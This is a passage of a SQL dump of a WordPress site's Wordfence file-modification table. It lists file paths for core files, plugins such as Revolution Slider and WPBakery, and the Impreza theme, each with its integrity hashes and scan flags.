(0xeff4b1a863b5d047bcb6b8286045bb95, 'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php', 1, 0x00000000000000000000000000000000, 0xfeef8020befb9ceaefe58ef251b9864c, 0x8b059ad5523231ce3fc78c2a3d62cda57d95f5b7a6935826fbbe4dad91c6b70e, '', 0, '?'),
(0xeffcdff4a0e69fd4e664519602f1c27e, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart03.svg', 0, 0xfc86b0d7225cbb6d06c523d65952001e, 0xfc86b0d7225cbb6d06c523d65952001e, 0xadfdf77d6725aa8cbe1dcca6f8181be5837e40e32842ef46c6d3bb24f33aaad3, '', 0, '?'),
(0xefff80c9391787ca72c00b4dd4a7c4e8, 'wp-includes/js/customize-preview-widgets.min.js', 1, 0x00000000000000000000000000000000, 0x7c7901cd82ff1df1dbc556fe17d42024, 0xd82b3b70aabdbd152e1d0145468d1e2e80f2ac6276dfae64c15608bef1de3523, '', 0, '?'),
(0xf00b0a43909141443878190405707f1f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure06.svg', 0, 0x0dfa72fc31d4f118a049f4690a2b6faa, 0x0dfa72fc31d4f118a049f4690a2b6faa, 0x9ef9dc0a62428cee3a2623108e20dc00d0c2e7652808181fac926e988ec571bc, '', 0, '?'),
(0xf00d344db86d77f10145274283418230, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file07.svg', 0, 0xdf5e15d3eaa92d073e922ff62290baac, 0xdf5e15d3eaa92d073e922ff62290baac, 0xb5cdfe80c7400184dd2cb7a32307ef230cc4df9f772d56288bb71235f3f9cd3d, '', 0, '?'),
(0xf0109e8abeb4bbb747ccf77ea854a778, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_one_24px.svg', 0, 0xe2616ffd205298ca0ae7173332ae31c9, 0xe2616ffd205298ca0ae7173332ae31c9, 0xdc6013297c004895e4320aac424b8bcb93d13e5acee554d52393ab7991af60e6, '', 0, '?'),
(0xf01920c07fde8d3c3a39ce137cc2ce36, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php', 1, 0x00000000000000000000000000000000, 0x2d5fd0fb62cac12d3e4f8ca55ce88b83, 0xa473c99467e125fbbd72691243af17f95098eb7786ab251492e57bd6c64aa5ce, '', 0, '?'),
(0xf0249fc4aba549885efd9333b794d112, 'wp-admin/menu-header.php', 1, 0x00000000000000000000000000000000, 0x0639947086b6d673b83b73739c57bddd, 0x813aeccd687fee7a17fb60eb4068a1ca49a15776eff32fb25fa639685ae7acbd, '', 0, '?'),
(0xf044cd3eb28ef31d4946eecf16e3c96f, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_high_quality_24px.svg', 0, 0xbe8d476c2ac24798ef02385f23cb3cdb, 0xbe8d476c2ac24798ef02385f23cb3cdb, 0x1b781b6d90be3c7c6ee637ccd66a5cf71d8bfe2202236a5aebc02f311f41a053, '', 0, '?'),
(0xf0492f1ab34ee732e9f70bf6e1c9f170, 'wp-includes/sodium_compat/src/Core32/Ed25519.php', 1, 0x00000000000000000000000000000000, 0x2cbb034bb0727a2d59baebcf5053d3a0, 0x86878edf94541af4ec71334fb09dae2c1d77ca4aa4823ca3d4fe6a838c8df282, '', 0, '?'),
(0xf062c6d750f9b1379e50193ca999db2a, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_supervisor_account_24px.svg', 0, 0x1f6803585c641072f0fa106ecb984632, 0x1f6803585c641072f0fa106ecb984632, 0x8baca22d596fcf731fabe4e1d9d9f025a0fb3ddcbca66d91fbdf732758325618, '', 0, '?'),
(0xf09639c6f1e8fb034b3af7a753ff12f1, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tonality_24px.svg', 0, 0x4166fef2b3cea8be76403a0fc98a4629, 0x4166fef2b3cea8be76403a0fc98a4629, 0xd0d0dc25360ed440682648da46e8e1fec84dbfc828357951cfa513018cb3900f, '', 0, '?'),
(0xf0a14e20b61ea2fb6904066916daadf9, 'wp-includes/random_compat/random_bytes_libsodium_legacy.php', 1, 0x00000000000000000000000000000000, 0xdcf85b719d3764e276b8edd77aeda814, 0x27d6aa95b12a097f121f5b0045452a4a8b72fc568073ede681c4e1e363039e3f, '', 0, '?'),
(0xf0bd6c50658535c2d8b62d86ba40f500, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/megaphone.svg', 0, 0xc432cac329eb443fc53f4d99c95268aa, 0xc432cac329eb443fc53f4d99c95268aa, 0x5be03a697f3495605d236d5c302e3930ba302d6f999550c1eef635bc008348ac, '', 0, '?'),
(0xf0bf86920fc2bff74f26b99026d4352f, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php', 0, 0x1e8491bccfa7f2ed4493429a7c982774, 0x1e8491bccfa7f2ed4493429a7c982774, 0xcb29e05c79acc4d4ae0ddd55087de5b3985930b7924985e6c23de654ccd53ec4, '', 0, '?'),
(0xf0d0b726a74cdbbdc2a8119de3564e8a, 'wp-includes/css/buttons.min.css', 1, 0x00000000000000000000000000000000, 0x3db7da28d89e8eaa2ae459c5adf59a92, 0x247280416955bd868093524c17f619b7358323d3f040dc847a0f9fdb0351621a, '', 0, '?'),
(0xf0f2d46ecc91345b6ad37c891c91ac8a, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_settings_system_daydream_24px.svg', 0, 0x8daa38339bae1d79060121d6d12dbf52, 0x8daa38339bae1d79060121d6d12dbf52, 0x2dd1182947dedff6b6522fcd83afa3b9a8f65aef44fb43e1052b735ea8e42b5a, '', 0, '?'),
(0xf0f6b4f803fc95f836245ba3aaae4fc0, 'wp-admin/css/customize-widgets.css', 1, 0x00000000000000000000000000000000, 0x4e338ddee64e1284d5fc128c1d68d3ce, 0xeca83bf6f69d9561956e5f3032e630077791504b4f50ba65ea3dccbfded7eac5, '', 0, '?'),
(0xf105f8e59372702e187585337a78800b, 'wp-admin/includes/class-ftp.php', 1, 0x00000000000000000000000000000000, 0x381db624f7426d11b79377ccf1f409a1, 0xe7336cd2867fd1fcddb75d89deea9d94c8d779ea4ba04ea1415a44ab6d184cb6, '', 0, '?'),
(0xf1265ba6c13e6afed2dc2fd6e2b64755, 'wp-includes/js/dist/token-list.min.js', 1, 0x00000000000000000000000000000000, 0x94af1e6e3c4a621d920bd15056ecd6df, 0xa8b7d1708f824b0ee81e1158cc5fb67cc372b4175bb208ee55ee4feae04a02ea, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xf1305958490fc011a71172f441d97140, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_grid.js', 0, 0x83885c8e25e90fbaf77a3b1155f4a0c3, 0x83885c8e25e90fbaf77a3b1155f4a0c3, 0x3679853ca30cd5fb9eef7d8251e992c92a5e0992d8c90a5ffea142099df09d60, '', 0, '?'),
(0xf13773fe5c5dd47d884141f9776531b7, 'wp-admin/tools.php', 1, 0x00000000000000000000000000000000, 0x9b93b6202cc659f0f099e0457ba6dabc, 0x659435a18739472dfb409c8b4a093730b0108bf58bc32cb5c467034176b2df51, '', 0, '?'),
(0xf143fd35233b99daf1f6f68438ec7620, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-laurels.svg', 0, 0x0fa0d283cd300be0a03c1bf9cbed0324, 0x0fa0d283cd300be0a03c1bf9cbed0324, 0xef19e87e8f08ddb16a0ea5b7827a09ac6d4460969e3288a4fb3d5f672da04f70, '', 0, '?'),
(0xf15a2fa5bcfb7b4c74e5d5ae4624801c, 'wp-admin/js/svg-painter.js', 1, 0x00000000000000000000000000000000, 0x045eeffbb70b6f0cb98f444cd5b16c85, 0xfc721e5a3b5b899537d3338304225d423e0df37c949d5e89aecfc1e619ce387a, '', 0, '?'),
(0xf15df7dfe04fa7bf70ece519c833e1c7, 'wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automap-model.php', 0, 0xc2ea0b09cf210b80e1f247721383da0f, 0xc2ea0b09cf210b80e1f247721383da0f, 0x1981d75486b791e494ece8153d577247851d17acfe4548f0550a08cdd22bc4dd, '', 0, '?'),
(0xf1605dea5219c63423e0e1ac770db10a, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_auto_24px.svg', 0, 0x8c307f3d5450892338bae01c40719055, 0x8c307f3d5450892338bae01c40719055, 0x73346ed032e3064b100134da461dd0872c9923db0a5086594b82d9dabb89bc88, '', 0, '?'),
(0xf169dda31f5be97e9b1d1d9e3f589dbb, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_post_office_24px.svg', 0, 0x3176293a03ae0fcea25867f375898c30, 0x3176293a03ae0fcea25867f375898c30, 0xf45e23c39be38d777afabde9aa738bfdce6e7b9dc2d1ac08222c2db069dd69b4, '', 0, '?'),
(0xf16ef540ed3e32d825554831085b6c2d, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-css/fonts/slick.svg', 0, 0xfc02b2ffe92c2ac15e09935a22831756, 0xfc02b2ffe92c2ac15e09935a22831756, 0x188f84cdb84872a797ff4d8b0389146fda539cd2d1741383448e53a201a8d0cc, '', 0, '?'),
(0xf17d38109f91539d33ad36ad150adf9a, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_btn.php', 0, 0x4cba9ca40d8b9944016701e4030518ca, 0x4cba9ca40d8b9944016701e4030518ca, 0xef298bf8575129dc2c2bb772da7213a5d2226b09e61bf768b19442768b73dd5f, '', 0, '?'),
(0xf18aa276108c113a07b944b81e59ec47, 'wp-includes/js/plupload/plupload.min.js', 1, 0x00000000000000000000000000000000, 0x257fc7bf0ae0ea044d61aa63b6c06f7c, 0x9b5290d2df3a0c841cd54b32b7e9d3631d7efd6eb20ba176c8420d2852b80568, '', 0, '?'),
(0xf19b61029f0ea63fa2f122887d4268ee, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_searching_24px.svg', 0, 0x3ea87818e4451dd679d951a62f1b6256, 0x3ea87818e4451dd679d951a62f1b6256, 0x5342b6c28d88d8de81f247cb3b8c2b621570eaf15f403d2c0f6e5b4d9594ebe2, '', 0, '?'),
(0xf1abe6e91224041eb8619a6435e99c54, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tour.php', 0, 0xf1f423e29f4633ccc5191e4acb885be4, 0xf1f423e29f4633ccc5191e4acb885be4, 0x608fb2d568e77632e0cc87455bd0ed3415ce84535e8671b8699a3251f6af3921, '', 0, '?'),
(0xf1b15459db03501d704506f19d778693, 'wp-includes/widgets/class-wp-widget-archives.php', 1, 0x00000000000000000000000000000000, 0x0d76d60ec8b2033d0f2070a589f1b427, 0x85bc90ff9102622af14f4e3a93a670d8d6610b0a3f148a14bd8a7794769987f8, '', 0, '?'),
(0xf1c6341291ec069010ef17db24ea8eaa, 'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php', 1, 0x00000000000000000000000000000000, 0x005719bfecae9cc3298ca0c7a2c7c2b1, 0x0498bf62c2a58fe9870fba1f551cbc5377ed8892d3fd67f792dfc33a183d50cb, '', 0, '?'),
(0xf1cf28b80f6aac2a05eb0c9cf7156377, 'wp-content/themes/Impreza/framework/templates/eform.php', 0, 0x7b658ddfefc84f7a260d88e6b3b4392b, 0x7b658ddfefc84f7a260d88e6b3b4392b, 0xb49854faf04d85927bceb8e8335ecbb21867bc09e9536d36c854e6695044ebfd, '', 0, '?'),
(0xf1d2c2ee0d6fcd6834352bf7f83d56ea, 'wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-undoredo.php', 0, 0xbb93a57934cae765e78ae42e280a0ab7, 0xbb93a57934cae765e78ae42e280a0ab7, 0x7555c01b1356de0d0dc9fa0e3cf8b0a56010597a1270b741f5fc486561f6567f, '', 0, '?'),
(0xf1e183ab6fa3d71a96fbca3a876ac554, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_snooze_24px.svg', 0, 0xdebec71f48861afdbb952c120c5d0f50, 0xdebec71f48861afdbb952c120c5d0f50, 0x02cb8ad54be1a7d5884466077ee50bcfd7f2cb2dbc7dcb84afe4eafcaa8e5b6d, '', 0, '?'),
(0xf1edef73a1a91322b3175f81f1da57eb, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_child_care_24px.svg', 0, 0xb8d664163ebd019bba2b80891b95a960, 0xb8d664163ebd019bba2b80891b95a960, 0xa6b64e49aff35a74a16dd6f5a4ae8eff6cb449a050e96af947e7c15e248c4178, '', 0, '?'),
(0xf1efaaaf08be7a79b4d5c83e5f2b9474, 'wp-includes/class-wp-user-meta-session-tokens.php', 1, 0x00000000000000000000000000000000, 0x9b382f2700b900b8a57618534c2d4700, 0xd6d311d7158e38ee90621eed5942263fd936971005ed6fcc1cdfd4121c3e1504, '', 0, '?'),
(0xf1f62fcd1cded3b114856037f6a424c5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_report_problem_24px.svg', 0, 0xe21c6b9d92bc28313aaada62f2636bcb, 0xe21c6b9d92bc28313aaada62f2636bcb, 0x9485d2da2add0f74e89baa050c746df3b453490c6f320df47c6f8adbb211326b, '', 0, '?'),
(0xf205aa0c24ba9e4d90f442d44b4d1b59, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_invitation_24px.svg', 0, 0xc7d7fdce14a03a9cf4ff8ec998d7f7e7, 0xc7d7fdce14a03a9cf4ff8ec998d7f7e7, 0x4d214ce74159283b33427e7ae332f27d926903c10bf0594a96b37f57169b8a55, '', 0, '?'),
(0xf20a35b164b3bfbe3f593a63d93d9d68, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager02.svg', 0, 0x59f0789ca486f06ce4ed4aba0dc8de5c, 0x59f0789ca486f06ce4ed4aba0dc8de5c, 0xc15d52c1e032c9f374802e3574d9ba4d4e6a0b2253c755e371c1d104ff7ea222, '', 0, '?'),
(0xf20f1ee3dd48f6722023e2772f933a34, 'wp-includes/js/dist/plugins.min.js', 1, 0x00000000000000000000000000000000, 0x5c33e1efc8af44769e3d823c939e08ab, 0xfe86cc195b7bf85fe5798f610f5be6baad3c3c5452282bf318b93d6b837998c8, '', 0, '?'),
(0xf21af2dee6df84b96d8bc2b5f1bf9221, 'wp-content/themes/Impreza/framework/widgets/us_contacts.php', 0, 0x6c55bbca45f22178826abfe07247d786, 0x6c55bbca45f22178826abfe07247d786, 0x9195b00969f8131ef0a3ec6155043688d4442f81195352f9a9bebfa77f1c3f96, '', 0, '?'),
(0xf226dd057859571941c05b71ebc96c56, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker02.svg', 0, 0x802fd5551a6757d8017d33d9a9a3f81a, 0x802fd5551a6757d8017d33d9a9a3f81a, 0xa7415a5460c17188b8a7e02c30a9fa639c2a0e0162d3317b688ff1bdb6733fc8, '', 0, '?'),
(0xf2310a02f20ce7cfc1c1a178bebfacd9, 'wp-includes/blocks/latest-posts.php', 1, 0x00000000000000000000000000000000, 0xc9c5e4864a746f8d6035919174871dea, 0x6703d9f4eb7131bd7eeeec453beae1a5fc4f782d7c753dac3be44898e09513ad, '', 0, '?'),
(0xf23fb2e2455f1ecf298a78da85249e9d, 'wp-admin/includes/deprecated.php', 1, 0x00000000000000000000000000000000, 0x51903c8b667709b3c5d917a77f5781b2, 0x24d4f3e471a56713c44be072be762bc61cc28c47bbacafb80c18ba1e3f2a152a, '', 0, '?'),
(0xf2556accfacd49024dccc2f17b7b2191, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.navigation.min.js', 0, 0xd7d15c9a54405a6197b7312617a077a6, 0xd7d15c9a54405a6197b7312617a077a6, 0xd40e6a4a40726ea6be4045066f4e3cdb81c322234b10601dce0eb8a1ff40134c, '', 0, '?'),
(0xf25893900ed4aae512d58a5c5656bf51, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_raw_js.js', 0, 0x88b7d45aa7c7829d8e26149c0c5f0ac2, 0x88b7d45aa7c7829d8e26149c0c5f0ac2, 0x448d39b62e56ee91663c9a020e3b848f12aa792cb78bcbe049bce90db006bb0c, '', 0, '?'),
(0xf264ed54016fc8668bf6d2b7dc621853, 'wp-content/plugins/wordfence/lib/menu_dashboard.php', 1, 0x00000000000000000000000000000000, 0x721e16bae8cd9dfac3ddad868dc9358f, 0xb3acb6fdf8b3e86f63406520e1a4b619d8f60f8fef6710e1c81a03b8dadb566a, '', 0, '?'),
(0xf26a9df11d0a6a3cc063aa4042890458, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php', 1, 0x00000000000000000000000000000000, 0x33dc1471dbd798778955f3dfcdb052c1, 0xfa4a775977af75a26ef80f965b8ac4ce2644d7464c56132df3324c1f15f2cbd6, '', 0, '?'),
(0xf26d142c632922bc7e3b8bc01cccb5be, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_parking_24px.svg', 0, 0x859c560dc6b1943da9e0c690ce29721d, 0x859c560dc6b1943da9e0c690ce29721d, 0xc073ddef11231c2dcdc7d6d321ebdd2fa974efbf15ac1630ee20fff57e207e07, '', 0, '?'),
(0xf2701f6f828db4583025f7a2c7edcfeb, 'wp-includes/css/editor-rtl.css', 1, 0x00000000000000000000000000000000, 0xc4faa8b5b7b501ba22c6bb57f156a1c9, 0x95dcdc17bc345f61a006be8185f002a9164d6210220324b5de37e9114a7f7989, '', 0, '?'),
(0xf2753bc88c30e5719477aa9c3de0df0c, 'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php', 1, 0x00000000000000000000000000000000, 0xd4b6774bbbb5e0b57f3ee17ebdf10d67, 0x23b7191587e84eea8c757d57e9fde64c21b05c5a20859438b210f0003b6b7bcf, '', 0, '?'),
(0xf289ddcba857bb4bf00647a434221995, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_sharing.php', 0, 0xb16265274866f3a0f1f7ab81fcfa074f, 0xb16265274866f3a0f1f7ab81fcfa074f, 0x61b481a5c1b81f92ebaf78d53030360894be141e44ed87da9a2dd671bf071159, '', 0, '?'),
(0xf2a824637bb139375ed086c8f74ad867, 'wp-includes/js/dist/server-side-render.min.js', 1, 0x00000000000000000000000000000000, 0x655821377848fd385c27c38c37d61a07, 0xfb1942a194d20f98506474f45e6ce150ea71e915116e31e9b421d68e8cd64c00, '', 0, '?'),
(0xf2b096fc4dc2d9a64dc62f0c7f60bc18, 'wp-includes/js/swfupload/handlers.js', 1, 0x00000000000000000000000000000000, 0xc2c1ec2ac323cd308b2dc6d58370f514, 0x48b323fdafa59f613a9a8731fa89c0d5f6f0ed97dfaf6f72726aec757ae07a56, '', 0, '?'),
(0xf2b1a0adfc1fb242c95204d47a878759, 'wp-includes/js/jquery/jquery.table-hotkeys.min.js', 1, 0x00000000000000000000000000000000, 0xe56f81676f199db7bf937e69a64909fa, 0x843cb28a3db81fa48d3b923ac1745f2c77ab04c48349b7ca1806c12c8a2c999c, '', 0, '?'),
(0xf2b57a1cb3329bc65407bf15235d6e53, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_business_24px.svg', 0, 0x9e216ce649eaf057483c8e945901a297, 0x9e216ce649eaf057483c8e945901a297, 0x6e40051099b1d60371d53dd0a241dc5d564a81f0108552d596d2b74d257941e4, '', 0, '?'),
(0xf2b63f7b6f0b5fb1b0b527bb186ed611, 'wp-admin/images/resize-2x.gif', 1, 0x00000000000000000000000000000000, 0x887b335656b4ed4656ac1c1966e4254b, 0xe687b47932717f99fe5af06fa0a67eb4a2285b971e826000601b43b8691a4c27, '', 0, '?'),
(0xf2c2cc5f667f04c2a0181024c14f3c6f, 'wp-admin/js/common.min.js', 1, 0x00000000000000000000000000000000, 0x617d7413ace49ebdbde150e781a0fc64, 0x28f45e8e6ddbdd6ce72e978d946496ec80a640e4aa366730173eac79d5be9573, '', 0, '?'),
(0xf2c3874a6fdc44cfe80ddb5aaef952ab, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lightbulb_outline_24px.svg', 0, 0xdbfa8829c808dda736c0dc04c30c0a18, 0xdbfa8829c808dda736c0dc04c30c0a18, 0x0836f28ed9ada28dcd35a4c84a4fe89857bd9ab8714a871a36c24cca34414132, '', 0, '?'),
(0xf2cc2967649d04040739a296f36d8d32, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book.svg', 0, 0x825f70551d205d0ae671f525af6b41bc, 0x825f70551d205d0ae671f525af6b41bc, 0x46ec5f0d626d5e104f8e495fc9573a3280a64a973c00ac2a3680c9aa91a4fee8, '', 0, '?'),
(0xf2ced92bd059bcecc35cfb5ee4aee1b6, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_lock_24px.svg', 0, 0xe7083766a0e6de751e33feebda626547, 0xe7083766a0e6de751e33feebda626547, 0x85c370d144d09fa51d72ef8e63dc2c03f37a6aa28bd5e83fa16aef4fd05ac04e, '', 0, '?'),
(0xf2d22506af00faca7a9466c04ec87053, 'wp-includes/js/tinymce/plugins/wpemoji/plugin.js', 1, 0x00000000000000000000000000000000, 0x671c895cbc8044b1c6145fba999eea7a, 0x904aee3ed961b7b3f02bbd1165f158fc0ea8b688786af973cc7644f3343398b6, '', 0, '?'),
(0xf2da77ce2b07222bfa24e319ac5e1cb8, 'wp-content/plugins/wordfence/lib/wfLog.php', 1, 0x00000000000000000000000000000000, 0x34fede929fbd0109114edc33f586aa47, 0xdf6fa7ddef84dfce5b470af05e952f1cf4c13b4cc5415e29be8c167f52bbac98, '', 0, '?'),
(0xf2ee7f1c0422917926639c09c3a3aab6, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_scroller.php', 0, 0x1a31d825d5d274c444194b2a4d589c7b, 0x1a31d825d5d274c444194b2a4d589c7b, 0x313fc2dc932c82c9457ccfcdf4e7d80f37148e9a9cf9f94d5b74560994e73316, '', 0, '?'),
(0xf30e38ca2a3d2cd3d0a7088a1b0fb8f4, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/vhparallax.min.js', 0, 0x4370101d230ef783bc1c98edb1b5eb4a, 0x4370101d230ef783bc1c98edb1b5eb4a, 0x4231f84fa0d7a00312677748f01b42f50886aec7f37eaac4eb601ed1964664d3, '', 0, '?'),
(0xf31015bffa23e58ff53152998d0ee95c, 'wp-content/plugins/js_composer/include/classes/core/class-vc-shared-library.php', 0, 0xdd76655adcf1e9dd1338b2a959100ec8, 0xdd76655adcf1e9dd1338b2a959100ec8, 0xbc331cbbc62d6df1e259332a6e99ba86c66d9cc17c0848e28f2c12153e1260a1, '', 0, '?'),
(0xf3235cfab7e2a82f87760e0516581e52, 'wp-admin/js/theme.js', 1, 0x00000000000000000000000000000000, 0x15c7a2d4f4cdac5a7ad33d2f66106258, 0x5e70a24f31e2af704dfb45a6b565ed386fbcf72986e49086557379d96ed09fbd, '', 0, '?'),
(0xf33dc404e219f6000eb451d3275948f0, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_code_24px.svg', 0, 0x11a2dc3ac91f5682f122d2c1a77620bf, 0x11a2dc3ac91f5682f122d2c1a77620bf, 0xf4950fb4849261ab468cce06de80569f3f6e7d2be5f2c7c7399f948f5760abe3, '', 0, '?'),
(0xf356a13cdffec3720a51b55d6a765850, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php', 1, 0x00000000000000000000000000000000, 0x5abfcd7ff82a064e66c7d9bc7b849d15, 0x699a94cbb67c3185d2e28f1b762e345baa28b6a008abf4d66d40663ef4bddb07, '', 0, '?'),
(0xf36a5dbd359da3a7662169b2556b5328, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_cform.php', 0, 0xe82ba3a31dff4d4d892b34bd0792b7db, 0xe82ba3a31dff4d4d892b34bd0792b7db, 0x4fd36a5faac302348d86c7e7ed281fdc9f9fa51f250d13c1e6612434ff2b4c27, '', 0, '?'),
(0xf36c4691aebedc63eb9295d24cc180f8, 'wp-admin/js/iris.min.js', 1, 0x00000000000000000000000000000000, 0x45076064fdcbfcf9f5c8996e10ac4bc9, 0x7aed54d2d549d6351618524b9462b2e662fa7dcd1c7548effed0d092630950ee, '', 0, '?'),
(0xf38711b21f4a8c19b40eab688caf1b76, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_power_24px.svg', 0, 0x28fc2e839160779af927e33fa53b2ec1, 0x28fc2e839160779af927e33fa53b2ec1, 0x88279846137965d45dada1585e5f66748c4d399783a3f6a4e0ab9bebba9002ea, '', 0, '?'),
(0xf38715e72cb76fd921c20e7abe6a22f3, 'wp-admin/css/edit.min.css', 1, 0x00000000000000000000000000000000, 0x7774dd0c0ffbbabb3f27bf90b63a20cf, 0xd444b26befc06c7d600398c3067c486df6b242e7d31a05bd2b47a3c24acce774, '', 0, '?'),
(0xf38ad8a05dd4669588f050f4a2860483, 'wp-content/plugins/wordfence/lib/wfLockedOut.php', 1, 0x00000000000000000000000000000000, 0x699afe3145d6eb71453c0b55e24215a6, 0xdcca6e19ab9f6d106ff8ad367d78b685393ebf2cea3ed56b075975759bc59ba7, '', 0, '?'),
(0xf3a6967d54f7708f635a4aca8589ede5, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-masonry-grid.svg', 0, 0x346eb6fcd10617ec01484f6c795b12d4, 0x346eb6fcd10617ec01484f6c795b12d4, 0xc3aa082feea24dc3bd8cec5ae384374ad4b4cf9dca935afd51065640cf18a843, '', 0, '?'),
(0xf3b51fd3ab7b9c859e2dcd024e7c1cfb, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_3.php', 0, 0x8d38c91a3c1c309f76e0625b02dc2966, 0x8d38c91a3c1c309f76e0625b02dc2966, 0x93415df0eac6e20f42128ef3693b9553336daa03dd462d9ffb566aafd6c4b713, '', 0, '?'),
(0xf3bdb34ef2b3cbf484fcabf3cf73c2f9, 'wp-includes/customize/class-wp-customize-custom-css-setting.php', 1, 0x00000000000000000000000000000000, 0x3310177975967f24650339b55b093f32, 0x26b355914a206d128244aaa085b187790b850133352b001d7a99f72862755bfc, '', 0, '?'),
(0xf3c9bcff94d86a8dba1c108b16301aed, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exchange.svg', 0, 0x117d0e61abfbecf88dd7f4434b0302e8, 0x117d0e61abfbecf88dd7f4434b0302e8, 0x376be2c1d31ed77e98ecbd30e697680c4e284519c1306b8f08037c36b8ab668e, '', 0, '?'),
(0xf3d8601fb359ceea9e221f56d1019e2a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-idea.svg', 0, 0xd4c98e2395a02d5894ad9cb0d0c8de32, 0xd4c98e2395a02d5894ad9cb0d0c8de32, 0x3ef7f3a89925e619eccd01dda7222203a2bcfa898d6e588d6abf51f2c83a38f2, '', 0, '?'),
(0xf3e1e71dd983b886830b759234fab809, 'wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php', 0, 0x3a9c7992b40107a4557b3236586e00ac, 0x3a9c7992b40107a4557b3236586e00ac, 0x721b42d3afc57665a5b9ec65fd6e7b431ed11927669c613a16839368f79ba64d, '', 0, '?'),
(0xf3e67c0a0e32ab4ab46c8cab22083076, 'wp-content/plugins/wordfence/css/wf-global.1579191227.css', 1, 0x00000000000000000000000000000000, 0xfebf8370041c5ddcfe24ee0888daa10a, 0xe6b787746a3f227f45dc00e4f324d39c20b64e6871ea33149bd57b9c96a4998c, '', 0, '?'),
(0xf3f3d2cdd1e29e9ef905aa5ed59852db, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php', 1, 0x00000000000000000000000000000000, 0xc9de6f019485e51e97b9e5a76880675b, 0x12800be0c015df81152ed6112d6834603953205f0de8932949cd2886ed57d3f2, '', 0, '?'),
(0xf3ff56ac936b39dbb4ee73bfbb80d6bf, 'wp-admin/css/customize-controls-rtl.css', 1, 0x00000000000000000000000000000000, 0x1fa7eb851c90dcc8a36840e23a715e00, 0xa4599caebf3834063e6527d8e606b8c84f719a1cf0247da54d7bc83ffd03edb3, '', 0, '?'),
(0xf406d9aa365bfe3443e01bf9e4e1c4ce, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Interactive_Banners.php', 0, 0x266332221b0d6e84b4ffc8af99d464a4, 0x266332221b0d6e84b4ffc8af99d464a4, 0xbd5a23ccb20106e44f4d5aae59c140e5b2b6a0a89b72b20ee9bd80f18c072450, '', 0, '?'),
(0xf40882128e3beaa25ef0a9b8b4386384, 'wp-includes/css/buttons.css', 1, 0x00000000000000000000000000000000, 0x7e528e095235c083a49611bdfa0cdf27, 0x6030bd33c269abbd63694221d04cf055179d62bbda50d087205a630e7b8fee30, '', 0, '?'),
(0xf435244b30272d5f623fd4a279b1b2c8, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_24px.svg', 0, 0x18429f03e4a02bb50fddee9aaf853d83, 0x18429f03e4a02bb50fddee9aaf853d83, 0xc4c278466356f5abebe7d2aa01984b479e9d580fcee82a44b7d672d68abf0343, '', 0, '?'),
(0xf44a1b1427238982724e8430610dc87f, 'wp-includes/images/crystal/audio.png', 1, 0x00000000000000000000000000000000, 0x996e56f18f3ac9cf89f347d8d42d236b, 0xa27e421a2dd7bc9d18046f667c57a278125cfeaa7ca84d0feb29e5df1589cba2, '', 0, '?'),
